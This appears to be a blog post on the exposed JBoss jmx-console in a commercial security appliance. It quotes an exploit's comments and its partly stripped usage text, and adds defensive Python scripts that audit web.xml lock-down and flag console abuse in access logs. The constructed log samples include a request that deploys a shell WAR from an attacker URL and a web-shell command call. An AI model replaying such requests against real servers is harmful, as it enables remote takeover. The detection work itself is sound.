
Embedded Appserver Complexity/Power/Vulnerability Example

So last month I blogged on J2EE application stack complexity, and yesterday's Protego/CS-MARS advisory provides a graphic example of these issues in a commercial security product:

From the exploit comments (I'll let you find it yourself):

# Unfortunately, little or no effort was put into securing the JBoss
# installation as per the JBoss community's recommended best practices.
# As such, the usual set of JBoss interfaces are wide open and it is up to
# the attacker how creative they want to be in compromising the box.  This
# particular exploit vector abuses the JBoss jmx-console for all sorts of
# fun.
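The "recommended best practices" the exploit comment refers to are, for the jmx-console, the security-constraint and login-config that JBoss ships commented out in jmx-console.war/WEB-INF/web.xml. The script below is an added example (not code from the original post, from the exploit, or from the JBoss project) that audits such a descriptor for the three states an installation tends to be in: constraint still commented out, constraint uncommented verbatim, and constraint with its GET/POST verb filter removed. The descriptors, the HtmlAdaptor servlet entry and the realm name are constructed to resemble the stock file, not copied from it.

```python
"""Audit a JBoss jmx-console WEB-INF/web.xml for the lock-down the exploit comment says was skipped.

Added example for this post; it is not code from the original page, from the exploit,
or from the JBoss project. The descriptors are constructed inline: they imitate the
shape of the stock jmx-console.war/WEB-INF/web.xml, whose security-constraint ships
commented out, but are not copies of any JBoss file.
"""
import re
import xml.etree.ElementTree as ET

# Constraint in the shape JBoss ships it: note the GET/POST filter.
CONSTRAINT_GET_POST = """
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>"""

# Same constraint with the verb list removed, so it applies to every method.
CONSTRAINT_ALL_VERBS = re.sub(r"\s*<http-method>[A-Z]+</http-method>", "", CONSTRAINT_GET_POST)


def web_xml(constraint: str) -> str:
    """Constructed jmx-console descriptor with the given constraint block spliced in."""
    return f"""<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>HtmlAdaptor</servlet-name>
    <servlet-class>org.jboss.jmx.adaptor.html.HtmlAdaptorServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HtmlAdaptor</servlet-name>
    <url-pattern>/HtmlAdaptor</url-pattern>
  </servlet-mapping>{constraint}
  <login-config>
    <auth-method>BASIC</auth-method>
    <realm-name>JBoss JMX Console</realm-name>
  </login-config>
</web-app>
"""


WEAK_WEB_XML = web_xml(f"\n  <!--{CONSTRAINT_GET_POST}\n  -->")  # as shipped: constraint commented out
PARTIAL_WEB_XML = web_xml(CONSTRAINT_GET_POST)                     # uncommented verbatim
HARDENED_WEB_XML = web_xml(CONSTRAINT_ALL_VERBS)                   # verb filter removed


def local(tag: str) -> str:
    """Strip an XML namespace: '{ns}url-pattern' -> 'url-pattern'."""
    return tag.rsplit("}", 1)[-1]


def children(elem, name):
    return [c for c in elem if local(c.tag) == name]


def texts(elems):
    return {e.text.strip() for e in elems if e.text and e.text.strip()}


def audit_jmx_console(descriptor: str) -> dict:
    """Return {'secured': bool, 'findings': [...]} for a jmx-console web.xml."""
    root = ET.fromstring(descriptor)
    findings, locked = [], False
    constraints = [e for e in root.iter() if local(e.tag) == "security-constraint"]
    if not constraints:
        findings.append("no active <security-constraint>: the console answers anyone who can reach it")
    for c in constraints:
        wrcs = children(c, "web-resource-collection")
        patterns = texts(e for w in wrcs for e in children(w, "url-pattern"))
        methods = texts(e for w in wrcs for e in children(w, "http-method"))
        ok = True
        if "/*" not in patterns:
            findings.append(f"constraint covers {sorted(patterns)} rather than /*")
            ok = False
        if methods:
            # Servlet spec: listing http-method confines the constraint to those verbs;
            # anything else (HEAD, PUT, ...) reaches the servlet unauthenticated.
            findings.append(f"constraint lists http-method {sorted(methods)}: other verbs are unprotected")
            ok = False
        if not children(c, "auth-constraint"):
            findings.append("constraint has no <auth-constraint>, so it grants access to everyone")
            ok = False
        locked = locked or ok
    if not any(local(e.tag) == "login-config" for e in root.iter()):
        findings.append("no <login-config>: nothing would ever challenge for credentials")
        locked = False
    return {"secured": locked, "findings": findings}


if __name__ == "__main__":
    for label, doc in ("shipped", WEAK_WEB_XML), ("uncommented", PARTIAL_WEB_XML), ("hardened", HARDENED_WEB_XML):
        print(label, audit_jmx_console(doc))
```

The middle case is the one worth noticing: simply uncommenting the shipped block is not enough, because a web-resource-collection that lists http-method elements only constrains those verbs, so the console stays reachable with HEAD or any other method. Drop the verb list so the constraint covers everything, and make sure a login-config (and a real user in the JBossAdmin role) exists.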

Having been playing around with Java scripting languages lately, I found it interesting that the exploit includes uploading (and executing) BeanShell code.

(Of course, who needs BeanShell when you've got a real shell, but it is the thought that counts!)

Extended Usage:
  Change password:    $0  pass
  Run shell command:  $0  cmd
  Run BeanShell code: $0  bsh /path/to/file/with/beanshell
  Upload files:       $0  upload   []
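Every one of those modes is just HTTP traffic to the console, so it leaves traces in the container's access log. As an added example (not code from the original post or from the exploit), the following flags the tell-tale requests in a few constructed access-log lines in the Tomcat/JBoss "common" pattern: console paths reached from hosts outside an allowlist, verbs other than GET and POST (which slip past a GET/POST-only security-constraint), and invokeOp calls against the MBeans the public exploits use to deploy or write files. The sample lines, the ADMIN_SOURCES allowlist and the MBean list are constructed for the example.

```python
"""Flag JBoss jmx-console abuse in access logs.

Added example for this post, not code from the original page or from the
exploit it discusses. SAMPLE_LOG is constructed traffic in the Tomcat/JBoss
"common" access-log pattern; ADMIN_SOURCES and DANGEROUS_MBEANS are
hypothetical tuning for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample, not captured traffic. Line 3 deploys a WAR from an attacker URL,
# line 4 is the resulting shell (invisible to this check), line 6 writes a file via HEAD,
# line 7 is a legitimate admin browsing an MBean.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2007:10:12:01 -0500] "GET /jmx-console/ HTTP/1.1" 200 5120
10.0.0.5 - - [14/Mar/2007:10:12:09 -0500] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1842
10.0.0.5 - - [14/Mar/2007:10:12:31 -0500] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service%3DMainDeployer&methodIndex=17&arg0=http%3A%2F%2F10.0.0.5%2Fshell.war HTTP/1.1" 200 1120
10.0.0.5 - - [14/Mar/2007:10:12:40 -0500] "GET /shell/cmd.jsp?c=id HTTP/1.1" 200 88
172.16.4.2 - - [14/Mar/2007:10:30:00 -0500] "GET /index.html HTTP/1.1" 200 2048
10.0.0.9 - - [14/Mar/2007:11:00:00 -0500] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin:service%3DDeploymentFileRepository&methodIndex=5 HTTP/1.1" 200 -
192.168.1.20 - admin [14/Mar/2007:11:05:00 -0500] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServerInfo HTTP/1.1" 200 9034
"""

CLF = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)

CONSOLE_PREFIXES = ("/jmx-console", "/web-console", "/invoker/")

# MBean operations the public exploits lean on once the console is reachable.
DANGEROUS_MBEANS = {
    "jboss.system:service=MainDeployer": "deploy an archive fetched from a caller-supplied URL",
    "jboss.admin:service=DeploymentFileRepository": "write a caller-supplied file under deploy/",
    "jboss.deployment:type=DeploymentScanner,flavor=URL": "point the deployment scanner at a caller-supplied URL",
}

ADMIN_SOURCES = {"192.168.1.20"}  # hypothetical allowlist of hosts permitted to use the console


def analyse(line: str):
    """Return a list of alert strings for a console request, or None for other traffic."""
    m = CLF.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.startswith(CONSOLE_PREFIXES):
        return None
    alerts = []
    if m["src"] not in ADMIN_SOURCES:
        alerts.append(f"{parts.path} reached from non-admin host {m['src']}")
    if m["method"] not in ("GET", "POST"):
        # A security-constraint listing only GET and POST leaves other verbs unauthenticated.
        alerts.append(f"{m['method']} request to console: verb outside a GET/POST-only constraint")
    # Arguments are visible only when sent in the query string; a POSTed form body is not
    # logged, so a POST invokeOp is caught here by source host only, never by MBean name.
    qs = parse_qs(parts.query)
    if qs.get("action", [""])[0] == "invokeOp":
        name = qs.get("name", [""])[0]  # parse_qs has already decoded %3D to '='
        if name in DANGEROUS_MBEANS:
            alerts.append(f"invokeOp on {name}: {DANGEROUS_MBEANS[name]}")
    return alerts


def scan(log: str):
    """Return (src, method, path, alerts) for every console request that raised an alert."""
    hits = []
    for line in log.splitlines():
        alerts = analyse(line)
        if alerts:
            m = CLF.match(line.strip())
            hits.append((m["src"], m["method"], urlsplit(m["target"]).path, alerts))
    return hits


if __name__ == "__main__":
    for src, method, path, alerts in scan(SAMPLE_LOG):
        print(f"{src} {method} {path}")
        for a in alerts:
            print("   -", a)
```

Two limits are deliberate in the comments: the console's own form posts carry their arguments in the request body, which the access log never records, so the MBean-name rule only fires on GET or HEAD requests; and the shell the attacker deploys afterwards lives under a brand-new context, so once the console has been abused you also need to watch for contexts appearing in deploy/ that nobody put there.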
